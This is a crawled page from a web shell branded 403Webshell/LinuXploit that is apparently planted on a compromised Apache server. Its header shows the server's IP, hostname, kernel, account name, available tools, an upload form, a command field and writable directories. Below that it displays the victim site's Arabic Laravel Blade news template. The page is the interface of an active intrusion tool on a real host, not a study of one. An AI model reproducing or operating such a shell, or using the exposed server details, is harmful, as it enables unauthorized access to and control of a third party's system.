403Webshell
Server IP : 3.138.164.131  /  Your IP : 216.73.216.136
Web Server : Apache
System : Linux ns1.techtime.me 4.18.0-147.8.1.el8.lve.1.x86_64 #1 SMP Mon Jun 29 09:55:57 EDT 2020 x86_64
User : injazaat ( 1471)
PHP Version : 8.1.20
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/injazaat/public_html/resources/views/ar/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/injazaat/public_html/resources/views/ar/press.blade.php
@extends('ar.layouts.layout')
@section('contant')
	<!--Page Title-->
	<section class="page-title">
            <div class="pattern-layer-one"></div>
            <div class="auto-container">
                <h2>الاخبار</h2>
                <ul class="page-breadcrumb">
                    <li><a href="{{route('home-ar')}}">الرئيسية</a></li>
                    <li>الاخبار</li>
                </ul>
            </div>
        </section>	
    <!--End Page Title-->
	<!-- News Section -->
	<section class="news-section">
		<div class="auto-container">
			<!-- Sec Title -->
			<div class="sec-title centered">
				<div class="title">{{ \App\Models\Settings::where('id', 17)->first()->value_ar }}</div>
				<h2> {{ \App\Models\Settings::where('id', 18)->first()->value_ar }}</h2>
			</div>
			<div class="row clearfix">
				<!-- News Block -->
				@foreach ($press as $item)
				<div class="news-block col-lg-4 col-md-6 col-sm-12">
					<div class="inner-box wow fadeInLeft" data-wow-delay="0ms" data-wow-duration="1500ms">
						<div class="image">
							<a href="{{route('press-details', $item->id)}}"><img src="{{$item->picture}}" alt="" /></a>
						</div>
						<div class="lower-content">
							
							<h4><a href="{{route('press-details', $item->id)}}">{{$item->title_ar}}</a></h4>
							<div class="text">{!! $item->description_ar !!}</div>
							<a class="read-more" href="{{route('press-details', $item->id)}}">المزيد<span class="arrow flaticon-long-arrow-pointing-to-the-right"></span></a>
						</div>
					</div>
				</div>
				@endforeach

			</div>
		</div>
	</section>
	<!-- End News Section -->    
@endsection

Youez - 2016 - github.com/yon3zu
LinuXploit